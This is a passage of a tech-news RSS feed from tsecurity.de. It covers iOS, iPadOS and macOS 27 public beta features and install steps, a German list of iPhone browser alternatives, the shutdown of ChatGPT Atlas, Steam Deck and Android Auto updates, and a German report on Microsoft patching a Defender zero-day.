Write with Siri: Siri can create drafts, improve existing text, and offer feedback in apps where users type. In Mail and Messages, it can also match the user’s writing style, punctuation, and tone.



Visual Intelligence on iPad: Users can ask questions about anything displayed on the screen. They can tap an object with a finger or circle it using Apple Pencil to search for more information or take an action.



Smarter Notes tools: Siri can work with typed and handwritten notes. It can organise bullet points, create an agenda, summarise information, or turn handwritten lecture notes into a study guide.



Apple Intelligence in apps: Photos, Safari, Messages, Calendar, Shortcuts, and other Apple apps receive new AI features. Photos adds improved editing tools, while Safari can organise tabs and help users find information more quickly.



Faster system performance: Apple has improved memory use, CPU scheduling, search, display rendering, and system responsiveness. Files should also handle large folders and external drives more efficiently, especially on newer iPad Pro models.



Liquid Glass improvements: iPadOS 27 refines the Liquid Glass design introduced with iPadOS 26. Updated controls, clearer backgrounds, stronger visual separation, and improved icon details should make the interface easier to read.



New child safety controls: Parents receive a redesigned dashboard for checking device activity and changing access quickly. Ask to Browse lets children request permission before opening restricted websites, while contact approval controls cover communication with new people.



Improved Shared Albums: Friends and family using Android or Windows can join albums and upload pictures through iCloud.com. Shared Albums also support full-resolution photos, reactions, filters, and additional invitation options.



Smarter Home features: Apple Intelligence can group related security camera notifications, describe recorded activity, and search clips using natural language. Compatible HomeKit Secure Video cameras can also stream and record in 4K with an eligible iCloud+ plan.




iPadOS 27 Compatible Devices



The iPadOS 27 public beta supports the following models:




iPad Pro 12.9-inch, 4th generation and newer



iPad Pro 11-inch, 2nd generation and newer



iPad Air, 4th generation and newer



iPad, 9th generation and newer



iPad mini, 6th generation and newer




However, Siri AI and other Apple Intelligence features require an iPad with an M1 chip or later, or the iPad mini with A17 Pro. Some advanced voice features require an M4 iPad with at least 12GB of unified memory.



Apple will continue updating the iPadOS 27 beta throughout the summer before releasing the final version later this year. Since this remains early software, users may experience app crashes, reduced battery life, heating, or compatibility problems.



If you’ve already installed the update, let us know your experience in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Releases macOS 27 Golden Gate Public Beta With Big AI Features]]></title>
<description><![CDATA[Apple has released the first public beta of macOS 27 Golden Gate, allowing users outside the developer program to test the update before its full release later this year. The public beta follows three developer beta releases and includes the new Siri AI experience, design refinements, improved se...]]></description>
<link>https://tsecurity.de/de/3666613/ios-mac-os/apple-releases-macos-27-golden-gate-public-beta-with-big-ai-features/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666613/ios-mac-os/apple-releases-macos-27-golden-gate-public-beta-with-big-ai-features/</guid>
<pubDate>Tue, 14 Jul 2026 02:08:28 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has released the first public beta of macOS 27 Golden Gate, allowing users outside the developer program to test the update before its full release later this year. The public beta follows three developer beta releases and includes the new Siri AI experience, design refinements, improved search, and several Apple Intelligence upgrades.



Since this is pre-release software, users should expect bugs, compatibility problems, increased battery use, and occasional performance issues. Apple recommends installing beta software on a secondary Mac or a separate partition rather than a work or business-critical computer.



How to install macOS 27 Golden Gate public beta



Back up your Mac before installing the update so you can protect your files if something goes wrong.




Visit the Apple Beta Software Program website and sign in using your Apple Account.



Enrol your Mac in the public beta program.



Open System Settings on your Mac.



Select General, followed by Software Update.



Click the information button next to Beta Updates.



Choose macOS 27 Golden Gate Public Beta from the menu.



Click Done and wait for the update to appear.



Select Update Now and follow the on-screen instructions.




The installation can take some time, and your Mac may restart several times during the process.



Everything new in macOS 27 Golden Gate public beta




New Siri AI experience: Siri now works as a more capable conversational assistant and supports natural follow-up questions. It can search the web, provide detailed answers, and help with tasks across supported apps.



Personal context searches: Siri can search information stored in apps such as Mail, Messages, Notes, and Photos. For example, users can ask Siri to locate an old email, find a particular photo, or retrieve information shared in a conversation.



Dedicated Siri app: macOS 27 introduces a separate Siri app that stores conversations in one place. Users can continue previous conversations, start new ones, and access Siri through Spotlight using Command + Space.



Visual Intelligence on Mac: Siri can examine content displayed on the screen and answer questions about it. This can help users understand documents, images, webpages, and other visible information.



Improved Spotlight search: Apple has updated the search system to deliver more reliable results across files, apps, emails, and messages. Users can also access Siri AI directly through Spotlight.



Updated Liquid Glass design: The update reduces excessive transparency and improves the way complex backgrounds appear behind menus and windows. Apple has also added more depth between interface elements, making it easier to identify the active window.



Transparency controls: Users can adjust the amount of system transparency using a new slider, providing more control over the Liquid Glass appearance.



More consistent windows and toolbars: Apps now use more consistent corner shapes, toolbar layouts, headings, and controls. Sidebars extend to the edges of windows instead of appearing as floating panels.



Writing tools powered by Siri: The updated writing tools can generate text, correct grammar, rewrite existing content, and offer feedback on drafts.



New Photos editing features: Apple Intelligence adds tools that can clean up unwanted objects, adjust image framing, and extend photos beyond their original borders.



Natural-language Shortcuts: Users can describe an automation in normal language, and the Shortcuts app will create the required actions without needing every step to be added manually.



Improved Mail and Messages search: Search results inside Mail and Messages are more accurate, making it easier to locate older conversations and information.



Safari extension builder: macOS 27 can create basic Safari extensions from natural-language instructions, reducing the amount of manual development required.



Updated iPhone Mirroring: The iPhone Mirroring app supports more flexible screen sizes and aspect ratios, making iPhone apps easier to view on a Mac.



Performance improvements: Apple has made system-level changes to improve responsiveness, display rendering, memory management, and CPU use, including on older supported Macs.




The first macOS 27 Golden Gate public beta gives users an early look at Apple’s upcoming Mac features, though bugs and unfinished tools remain possible throughout the testing period. If you’ve already installed the update, let us know your experience in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[iOS 27 Public Beta Is Now Available: Here’s Everything New]]></title>
<description><![CDATA[Apple has released the first iOS 27 public beta, giving iPhone users an early look at Siri AI, faster system performance, refined Liquid Glass visuals, and several useful app upgrades. The beta is free to install, although users should expect bugs, battery drain, and occasional app compatibility ...]]></description>
<link>https://tsecurity.de/de/3666598/ios-mac-os/ios-27-public-beta-is-now-available-heres-everything-new/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666598/ios-mac-os/ios-27-public-beta-is-now-available-heres-everything-new/</guid>
<pubDate>Tue, 14 Jul 2026 01:53:56 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has released the first iOS 27 public beta, giving iPhone users an early look at Siri AI, faster system performance, refined Liquid Glass visuals, and several useful app upgrades. The beta is free to install, although users should expect bugs, battery drain, and occasional app compatibility problems.



How to Install the iOS 27 Public Beta



Back up your iPhone through iCloud or a computer before installing the beta. Using a secondary device is safer because returning to iOS 26 can require erasing the iPhone.




Visit the Apple Beta Software Program website.



Sign in using the Apple Account connected to your iPhone.



Accept the program terms and enroll your account.



Open Settings on your iPhone.



Go to General &gt; Software Update &gt; Beta Updates.



Select iOS 27 Public Beta.



Return to the previous screen and tap Update Now.




Your iPhone must have enough available storage, a stable Wi-Fi connection, and sufficient battery power to complete the installation.



Everything New in the iOS 27 Public Beta




Siri AI: Siri now supports more natural conversations, follow-up questions, personal information searches, onscreen awareness, and actions across supported apps. A dedicated Siri app also stores previous conversations. Siri AI requires an iPhone that supports Apple Intelligence.



Visual Intelligence in Camera: Users can point the camera at real-world information and ask Siri for help. The system can identify details, extract information, create calendar events, and perform tasks such as reading a barcode or analysing a meal.



Faster iPhone performance: Apple has improved app launches, AirDrop transfers, photo processing, keyboard loading, unlocking, Home Screen navigation, and system animations. These improvements also apply to older supported models, including the iPhone 11 series.



Liquid Glass controls: iOS 27 refines the Liquid Glass design introduced with iOS 26. A new slider under Settings &gt; Appearance lets users adjust how clear or tinted the interface appears.



Smarter Safari tools: Safari can automatically group tabs and organize bookmarks by topic. It can also watch webpages for changes and help users create extensions through natural-language instructions.



New Photos editing features: The Photos app includes an improved Clean Up tool for removing larger distractions. Extend can generate content beyond the edges of a photo, while Spatial Reframing lets users adjust the apparent camera angle after taking a picture.



Natural-language Shortcuts: Users can describe an automation in everyday language, and the Shortcuts app will build it. Additional instructions can refine the automation without starting again.



Improved password security: The Passwords app can replace some weak or compromised passwords automatically. It can also manage verification codes and show the replacement process through a Live Activity.



Screen Time redesign: Parents receive a clearer activity dashboard, category-based time allowances, and schedules for school days, evenings, and weekends. Children can request permission before visiting certain websites or contacting new people.



More child safety features: Communication Safety can detect and blur sensitive images. iOS 27 expands these protections to include violent or graphic content.



AirPods custom equalizer: Compatible AirPods gain separate controls for low, mid, and high frequencies, giving users more control over how music and other audio sound.



Messages improvements: Large photos and videos can continue sending in the background without delaying newer messages. Group conversations also handle Tapback notifications more clearly.



Better Photos sharing: Shared Albums support full-resolution media, contributions from Windows and Android devices, keywords, star ratings, and customizable slideshows.



Independent alarm volume: Users can change alarm volume without changing the overall system volume.



Larger Home Screen widgets: New extra-large widgets can take up an entire Home Screen page and show more information at once.



Home app upgrades: The Home app adds improved HomeKit Secure Video reliability and support for compatible 4K security cameras.



Better network switching: iPhones can move between Wi-Fi and cellular data more quickly when the current connection becomes weak.




The iOS 27 public beta will receive more updates before the final version arrives later this year. Anyone testing the software can report bugs through the Feedback Assistant app.



If you’ve already installed the update, let us know your experience in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Android Auto: Neues Update behebt ab sofort ungewöhnlichen Fehler]]></title>
<description><![CDATA[Wer Android Auto nutzt, wird die zahlreichen Vor- und Nachteile des Systems bereits kennen. Besonders vorteilhaft ist zweifellos Googles schnelle Reaktion auf Fehler.]]></description>
<link>https://tsecurity.de/de/3663657/it-nachrichten/android-auto-neues-update-behebt-ab-sofort-ungewoehnlichen-fehler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663657/it-nachrichten/android-auto-neues-update-behebt-ab-sofort-ungewoehnlichen-fehler/</guid>
<pubDate>Sun, 12 Jul 2026 19:32:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wer Android Auto nutzt, wird die zahlreichen Vor- und Nachteile des Systems bereits kennen. Besonders vorteilhaft ist zweifellos Googles schnelle Reaktion auf Fehler.]]></content:encoded>
</item>
<item>
<title><![CDATA[iPhone-Browser: Die 12 besten Safari-Alternativen]]></title>
<description><![CDATA[Kein Safari-Fan? Kein Problem. iPhone-Nutzern stehen mehr Optionen in Sachen Browsing offen.
					Foto: Camilo Concha – shutterstock.com




Seit der Veröffentlichung von iOS 14 im Jahr 2020 erlaubt Apple es iPhone-Nutzern, einen anderen Standardbrowser als Safari festzulegen. Bevor Sie nun jedoc...]]></description>
<link>https://tsecurity.de/de/3661205/it-security-nachrichten/iphone-browser-die-12-besten-safari-alternativen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661205/it-security-nachrichten/iphone-browser-die-12-besten-safari-alternativen/</guid>
<pubDate>Sat, 11 Jul 2026 06:06:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Kein Safari-Fan? Kein Problem. iPhone-Nutzern stehen mehr Optionen in Sachen Browsing offen." title="Kein Safari-Fan? Kein Problem. iPhone-Nutzern stehen mehr Optionen in Sachen Browsing offen." src="https://images.computerwoche.de/bdb/3380485/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Kein Safari-Fan? Kein Problem. iPhone-Nutzern stehen mehr Optionen in Sachen Browsing offen.</p></figcaption></figure><p class="imageCredit">
					Foto: Camilo Concha – shutterstock.com</p></div>




<p>Seit der Veröffentlichung von iOS 14 im Jahr 2020 erlaubt Apple es <a href="https://www.computerwoche.de/k/iphone-apps,3459" target="_blank" class="idgGlossaryLink">iPhone</a>-Nutzern, einen anderen Standardbrowser als Safari festzulegen. Bevor Sie nun jedoch einfach die nächstbeste App installieren, die nicht Safari ist: Es lohnt sich, die vorhandenen Angebote vorab zu testen, um herauszufinden, welches am besten auf Ihre Bedürfnisse passt. </p>



<p>Dabei ist erwähnenswert, dass Apple Entwickler dazu verpflichtet, für alle Browser dieselbe WebKit-Rendering-Engine wie für Safari zu verwenden. Im Grunde sind also sämtliche iOS-Browser WebKit mit einer jeweils anderen Hülle.</p>



<h2 class="wp-block-heading">Die 12 besten iPhone-Browser, die nicht Safari sind</h2>



<p>Trotzdem haben die folgenden zwölf Browser für iPhone alternative oder umfangreichere (Business-)Funktionen und Oberflächen zu bieten. </p>



<p><strong><a href="https://apps.apple.com/de/app/aloha-browser-privat-vpn/id1105317682" title="Aloha Browser" target="_blank" rel="noopener">Aloha Browser</a></strong></p>



<p>Aloha ist ein funktionsreicher mobiler Browser, der hawaiianisches Flair versprüht. Darüber hinaus bietet Aloha Datenschutzfunktionen wie:</p>



<ul class="wp-block-list">
<li><p>Werbeblocker,</p></li>



<li><p>private Tabs,</p></li>



<li><p>eine Krypto-Wallet,</p></li>



<li><p>einen internen Dateimanager für Downloads, Medien und Dokumente,</p></li>



<li><p>geräteübergreifende Synchronisierung sowie</p></li>



<li><p>VPN.</p></li>
</ul>



<p>Ein Premium-Abonnement (26 Euro pro Jahr) ermöglicht erweiterte <a href="https://www.computerwoche.de/article/2748566/vpn-verbindungen-das-muessen-sie-wissen.html" title="VPN" target="_blank">VPN</a>-Funktionen und auch, den gesamten Datenverkehrs von Ihrem <a href="https://www.computerwoche.de/k/iphone-apps,3459" target="_blank" class="idgGlossaryLink">iPhone</a> zu verschlüsseln, statt nur innerhalb des Aloha-Browsers.</p>



<p><strong><a href="https://apps.apple.com/de/app/google-chrome/id535886823" title="Chrome" target="_blank" rel="noopener">Chrome</a></strong></p>



<p>Googles Chrome ist wahrscheinlich der populärste Browser für Mobilgeräte überhaupt – was in erster Linie der <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Dominanz auf dem weltweiten Smartphone-Markt geschuldet ist.</p>



<p>Wenn Sie den <a href="https://www.computerwoche.de/article/2805495/so-arbeiten-sie-besser-mit-google-chrome.html" title="Chrome-Desktop-Browser" target="_blank">Chrome-Desktop-Browser</a> verwenden, können Sie Lesezeichen und zuletzt besuchte Websites über Ihr Google-Konto synchronisieren und so die Handoff-Funktion von Safari nachahmen. Außerdem gibt es einen One-Touch-Zugang zu Google Translate, eine Sprachsuche mit Google Assistant anstelle von Siri und einen praktischen QR-Code-Scanner über der virtuellen Tastatur. Der Inkognito-Modus von Chrome sendet keine Cookies und speichert keinen Browserverlauf.</p>



<p><strong><a href="https://apps.apple.com/gb/app/dolphin-mobile-browser/id634693702" target="_blank" rel="noreferrer noopener">Dolphin Browser</a></strong></p>



<p>Dieser mobile Browser bringt zahlreiche Funktionen mit. Unter anderem können Sie mit Dolphin per Gesten- und Sprachsteuerung surfen oder Registerkarten mit nur einem Fingertipp sharen.</p>



<p>Darüber hinaus bietet der Dolphin Browser auch Werbe- und Tracking-Blocker sowie ein nützliches Schnellmenü, über das die zahlreichen Funktionen schnell und einfach erreichbar sind.</p>



<p><strong><a href="https://apps.apple.com/de/app/duckduckgo-private-browser/id663592361" title="DuckDuckGo Private Browser" target="_blank" rel="noopener">DuckDuckGo Private Browser</a></strong></p>



<p>Wie bei der <a href="https://www.computerwoche.de/article/2776713/die-besten-google-alternativen.html" title="Suchmaschine" target="_blank">Suchmaschine</a> liegt der Fokus beim Browser von DuckDuckGo auf dem Schutz der Privatsphäre. Für Sie heißt das: Sie können surfen, ohne getrackt zu werden.</p>



<p>Eine Schaltfläche mit einem “Feuer”-Symbol sorgt dafür, dass Sie sämtliche Registerkarten und Surf-Daten mit nur einem Tastendruck löschen können (und sogar eine Animation ihrer Wahl dazu auswählen können). Ebenfalls eine nennenswerte Funktion: Sie können Webseiten als “fireproof” kennzeichnen. Dann werden Cookies für Anmeldung, Warenkorb, etc. gesetzt – die Tracking-Versuche von Drittanbietern bleiben dennoch wirkungslos.</p>



<p><strong><a href="https://apps.apple.com/de/app/microsoft-edge/id1288723196" target="_blank" rel="noreferrer noopener">Edge</a></strong></p>



<p><a href="https://www.computerwoche.de/article/2823167/edge-browser-zwang-in-teams-und-outlook.html" title="Microsoft Edge" target="_blank">Microsoft Edge</a> synchronisiert Favoriten und Kennwörter zwischen all Ihren Geräten (die mit den Cloud-Servern von Microsoft verbunden sind). Mit dem Befehl “An alle Geräte senden” können Sie eine Registerkarte von Ihrem <a href="https://www.computerwoche.de/k/iphone-apps,3459" target="_blank" class="idgGlossaryLink">iPhone</a> an andere verbundene Geräte senden. Edge bietet außerdem:</p>



<ul class="wp-block-list">
<li><p>generative KI-Funktionen mit <a title="Bing Chat!" href="https://www.microsoft.com/de-de/edge/features/bing-chat?form=MT00D8" target="_blank" rel="noopener">Bing Chat!</a>,</p></li>



<li><p>Sprachbasierte Suchen,</p></li>



<li><p>Tracking- und Werbeblocker,</p></li>



<li><p>InPrivate-Tabs, die keine Browsing-Daten speichern und</p></li>



<li><p>die Möglichkeit, sowohl private als auch geschäftliche Microsoft-Konten zu nutzen.</p></li>
</ul>



<p><strong><a href="https://apps.apple.com/de/app/firefox-private-safe-browser/id989804926" title="Firefox" target="_blank" rel="noopener">Firefox</a></strong></p>



<p>Mozillas <a href="https://www.computerwoche.de/article/2816844/mozilla-sucht-den-suendenbock.html" title="Firefox" target="_blank">Firefox</a> auf dem <a href="https://www.computerwoche.de/k/iphone-apps,3459" target="_blank" class="idgGlossaryLink">iPhone</a> zu nutzen, empfiehlt sich, wenn Sie den Browser bereits mit anderen Geräten verwenden. Dann werden Lesezeichen, Kennwörter und andere Informationen automatisch synchronisiert.</p>



<p>Die modifizierbare Startseite enthält unter anderem Verknüpfungen zu zuletzt besuchten Webseiten. Firefox für iOS verfügt außerdem über die gleiche Anti-Ad-Tracking-Technologie wie die Desktop-Version.</p>



<p><strong><a href="https://apps.apple.com/de/app/firefox-klar/id1073435754" title="Firefox Klar" target="_blank" rel="noopener">Firefox Klar</a></strong></p>



<p>Neben dem “normalen” Firefox bietet Mozilla auch eine schlanke, ablenkungsfreie Option namens Firefox Klar an. Wenn Sie sich leicht ablenken lassen, unter ADHS leiden oder einfach nur ein wenig Hilfe brauchen, um bei der Sache zu bleiben, empfiehlt sich diese Option als Alternative (oder Ergänzung) zu <a href="https://www.computerwoche.de/article/2814355/so-filtern-sie-unwichtiges.html" title="Apples Fokus-Modi" target="_blank">Apples Fokus-Modi</a>, die in iOS integriert sind.</p>



<p>Firefox Klar blockiert standardmäßig Werbung und Tracker, und Sie können Ihren Browserverlauf, Ihre Kennwörter und Cookies mit einem einzigen Tipp auf das allgegenwärtige Mülleimer-Symbol löschen.</p>



<p><strong><a href="https://apps.apple.com/de/app/onion-browser/id519296448" title="Onion Browser" target="_blank" rel="noopener">Onion Browser</a></strong></p>



<p>Der ursprüngliche <a href="https://www.computerwoche.de/article/2744907/das-tor-netzwerk-im-unternehmen.html" title="Tor-Browser für den Desktop" target="_blank">Tor-Browser für den Desktop</a> wurde vom Tor-Projekt entwickelt und nutzt das gleichnamige Netzwerk, um Ihre Identität und Ihre Online-Aktivitäten zu verschleiern. Das macht Tor so gut wie kein anderer Browser. Allerdings gilt es dabei zu beachten, dass die Weiterleitung des Datenverkehrs durch Tor das Surferlebnis verlangsamt und auch viele Webseiten nicht richtig funktionieren. Ottonormal-User brauchen den Tor-Browser in der Regel nicht.</p>



<p>Das eingangs genannte WebKit-“Problem” verhindert einen ähnlich umfassenden Schutz der Privatsphäre, wie sie die Desktop-Version bietet. Erfahrene Tor-Benutzer wissen, wie sie den Browser richtig konfigurieren. Neueinsteiger haben es dank eines dreistufigen Sicherheitskonzepts einfach.</p>



<p><strong><a href="https://apps.apple.com/de/app/opera-browser-und-vpn/id1411869974" title="Opera" target="_blank" rel="noopener">Opera</a></strong></p>



<p>Der Opera-Mobilbrowser wurde ursprünglich entwickelt, um den Datenverbrauch zu senken und dafür zu sorgen, Webseiten auf Low-End- und Budget-Smartphones schneller zu laden. Dennoch können auch <a href="https://www.computerwoche.de/k/iphone-apps,3459" target="_blank" class="idgGlossaryLink">iPhone</a>-Nutzer von seiner Geschwindigkeit und Effizienz profitieren.</p>



<p>Neben der Komprimierungsfunktion, die einen von Opera betriebenen Web-Proxy nutzt, enthält der Browser auch:</p>



<ul class="wp-block-list">
<li><p>Generative-AI-Funktionen mit der <a title="Browser-KI Aria" href="https://www.computerwoche.de/article/2824331/das-bessere-chatgpt.html" target="_blank">Browser-KI Aria</a>, </p></li>



<li><p>einen Werbeblocker,</p></li>



<li><p>eine Krypto-Wallet und</p></li>



<li><p>ein VPN.</p></li>
</ul>



<p>Letztgenanntes Feature ist eher rudimentär ausgestaltet, verschlüsselt nur den Datenverkehr innerhalb von Opera und ist auf drei allgemeine Regionen beschränkt (Europa, Amerika und Asien).</p>



<p><strong><a href="https://apps.apple.com/de/app/orion-browser-by-kagi/id1484498200" title="Orion Browser" target="_blank" rel="noopener">Orion Browser</a></strong></p>



<p>Auf den ersten Blick wirkt Orion wie ein sehr simpler Browser mit typischem Funktionsumfang. Ein Blick in die Einstellungen zeigt jedoch, dass es bei Orion mehr zu entdecken gibt. Darunter beispielsweise verschiedene Modi, die Ihnen dabei helfen, sich zu konzentrieren, Ihre Datennutzung zu optimieren und Ihren Akku zu schonen.</p>



<p>Darüber hinaus blockiert Orion auch Werbung und Tracker und unterstützt die Synchronisierung von Inhalten zwischen mehreren Geräten. Zudem lässt sich der Browser zusätzlich mit Face- beziehungsweise Touch ID oder Passcode absichern.</p>



<p><strong><a title="Search All" href="https://apps.apple.com/de/app/search-all-web-browser/id1059929800" target="_blank" rel="noopener">Suchkönig-Multi-Engine Browser</a></strong></p>



<p>Bei diesem Browser ist der Name Programm: Er wurde entwickelt, um parallel auf diversen Plattformen nach Inhalten zu suchen. Dazu können Sie aus mehr als 50 verschiedenen Websites wählen, darunter:</p>



<ul class="wp-block-list">
<li><p>Suchmaschinen,</p></li>



<li><p>Online-Shops,</p></li>



<li><p>Videoplattformen,</p></li>



<li><p>Bild-Repositories,</p></li>



<li><p>Wiki-Sites,</p></li>



<li><p>etliche soziale Netzwerke und</p></li>



<li><p>sogar Comic-Bibliotheken.</p></li>
</ul>



<p>Die jeweiligen Ergebnisse erhalten Sie in separaten Registerkarten. Die Möglichkeit, so viele Dienste und Plattformen parallel zu durchsuchen, kann unglaublich nützlich sein – etwa für die Recherche zu bestimmten Themen oder auch zu Preisvergleichszwecken.</p>



<p><strong><a href="https://apps.apple.com/de/app/spin-safe-browser/id1069119528?platform=iphone" title="SPIN Safe Browser" target="_blank" rel="noopener">SPIN Safe Browser</a></strong></p>



<p>Der Fokus von SPIN Safe Browser liegt – wie der Name nahelegt – darauf, <a href="https://www.computerwoche.de/article/2795599/so-werden-sie-fast-unsichtbar-im-netz.html" title="sicheres Surfen" target="_blank">sicheres Surfen</a> zu ermöglichen. Zusätzlich zu den Datenschutz-Funktionen bietet der mobile Browser auch die Möglichkeit, bestimmte (fragwürdige) Inhalte oder Bilder zu filtern.</p>



<p>Was SPIN von den anderen Safari-Alternativen in dieser Auflistung abhebt: Die Entwickler wollen mit ihrem Offering gezielt den Bildungs- und Enterprise-Markt adressieren. Dazu stellen Sie auch eine 20 Dollar teure Version des Browsers zur Verfügung, der über AppConfig-kompatible <a title="MDM-Plattformen" href="https://www.computerwoche.de/article/2744983/die-besten-loesungen-fuers-unified-endpoint-management.html" target="_blank">MDM-Plattformen</a> angepasst werden kann. IT-Abteilungen können den Browser also bereitstellen und verfügen über umfassende Management- und Kontrollmöglichkeiten. (fm)</p>



<p><strong>Dieser Artikel ist <a href="https://www.computerworld.com/article/1625235/safari-alternatives-ios-browsers.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Computerworld.com erschienen.</strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ChatGPT Atlas Is Shutting Down, But Here Are Some Popular Alternatives]]></title>
<description><![CDATA[OpenAI is officially pulling the plug on its dedicated web browser, but that does not mean you have to give up on smart web navigation. Since ChatGPT Atlas failed to capture a massive audience, the company decided to shut it down and move its core features to the desktop app. If you still want a ...]]></description>
<link>https://tsecurity.de/de/3660299/ios-mac-os/chatgpt-atlas-is-shutting-down-but-here-are-some-popular-alternatives/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660299/ios-mac-os/chatgpt-atlas-is-shutting-down-but-here-are-some-popular-alternatives/</guid>
<pubDate>Fri, 10 Jul 2026 18:01:21 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenAI is officially pulling the plug on its dedicated web browser, but that does not mean you have to give up on smart web navigation. Since ChatGPT Atlas failed to capture a massive audience, the company decided to shut it down and move its core features to the desktop app. If you still want a dedicated browser built around artificial intelligence tools, you have several great alternatives available.



Popular alternatives like Comet and Dia lead the browser pack



While the ChatGPT Atlas browser is shutting down, other platforms are stepping up to fill the gap. Perplexity regularly updates its Comet browser, which works nicely with different artificial intelligence systems. Comet started on the Mac but is now making its way to mobile devices like the iPhone and iPad.



Another big option comes from The Browser Company, which recently launched Dia as the official successor to Arc. If you want something experimental, Opera Neon bills itself as an AI browser, though it requires a monthly subscription. A newcomer called Aside is also gaining attention as a lightweight choice for Mac users who want to keep things simple.



Chrome extensions and Safari offer simpler ways to stay connected



You do not necessarily need a brand-new browser to get these smart features. Before ending Atlas, OpenAI released a dedicated Chrome extension that brings the chatbot directly to any browser built on the Chromium engine. Google also includes Gemini right inside Chrome, giving users multiple ways to get help without switching their primary internet tool.



For users who want to keep their current setup untouched, sticking with Safari is completely fine. You can simply use standard web browsers and rely on background software like ChatGPT Codex to handle your complex online tasks. Even with Atlas gone, having smart tools in your daily internet routine is easier than ever to set up.]]></content:encoded>
</item>
<item>
<title><![CDATA[Steam Deck: Valve rollt neues Update mit praktischen Fixes aus]]></title>
<description><![CDATA[Valve stellt ein neues Beta-Update für das Steam Deck zur Ver­fü­gung. Die Aktualisierung bringt eine erweiterte Controller-Unter­stützung, neue FPS-Limits für das Streaming und behebt zudem lästige Fehler bei der UI-Skalierung.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3658888/it-security-nachrichten/steam-deck-valve-rollt-neues-update-mit-praktischen-fixes-aus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658888/it-security-nachrichten/steam-deck-valve-rollt-neues-update-mit-praktischen-fixes-aus/</guid>
<pubDate>Fri, 10 Jul 2026 08:23:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,159887.html"><img hspace="5" border="0" align="left" alt="Gaming, Spiele, Konsole, Spielkonsole, Games, Konsolen, Spielekonsole, Spielekonsolen, OLED, Valve, Handheld, Steam Deck, Limited Edition, Special Edition, White Edition" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/77467.jpg"></a>
			Valve stellt ein neues Beta-Update für das <a href="https://winfuture.de/special/steam/" title="Steam Special">Steam</a> Deck zur Ver­fü­gung. Die Aktualisierung bringt eine erweiterte Controller-Unter­stützung, neue FPS-Limits für das Streaming und behebt zudem lästige Fehler bei der UI-Skalierung.			(<a href="https://winfuture.de/news,159887.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft behebt kritische Sicherheitslücke in Windows Defender]]></title>
<description><![CDATA[Vor circa einem Monat veröffentlichte der anonyme Sicherheitsforscher Nightmare Eclipse Informationen über Rogue Planet, eine sogenannte Zero-Day-Schwachstelle in der Defender-Sicherheitssoftware von Microsoft.



Die Sicherheitslücke, die offiziell als CVE-2026-50656 bezeichnet wurde, kann von H...]]></description>
<link>https://tsecurity.de/de/3657569/it-nachrichten/microsoft-behebt-kritische-sicherheitsluecke-in-windows-defender/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657569/it-nachrichten/microsoft-behebt-kritische-sicherheitsluecke-in-windows-defender/</guid>
<pubDate>Thu, 09 Jul 2026 17:46:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Vor circa einem Monat veröffentlichte der anonyme Sicherheitsforscher Nightmare Eclipse <a href="https://www.pcwelt.de/article/3170412/microsoft-verspricht-sicherheitsluecke-in-defender-zu-schliessen.html" target="_blank" rel="noreferrer noopener">Informationen über Rogue Planet</a>, eine sogenannte Zero-Day-Schwachstelle in der <a href="https://www.pcwelt.de/article/2652374/was-ist-microsoft-defender-und-wie-gut-schutzt-es-vor-viren-und-anderen-bedrohungen.html" target="_blank" rel="noreferrer noopener">Defender</a>-Sicherheitssoftware von Microsoft.</p>



<p>Die Sicherheitslücke, die offiziell als CVE-2026-50656 bezeichnet wurde, kann von Hackern ausgenutzt werden, um vollen Zugriff auf Ihren Computer zu erlangen.</p>



<p>Die Seite <a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-patches-rogueplanet-defender-zero-day-vulnerability/" target="_blank" rel="noreferrer noopener">Bleeping Computer</a> berichtet nun, dass Microsoft einen Sicherheitsfix für Rogue Planet veröffentlicht hat, und zwar über ein Update der Malware Protection Engine (der zentralen Scan-Engine, auf der Microsofts Sicherheitslösungen und -dienste basieren). Sie bekommen den Patch automatisch über Windows Update.</p>



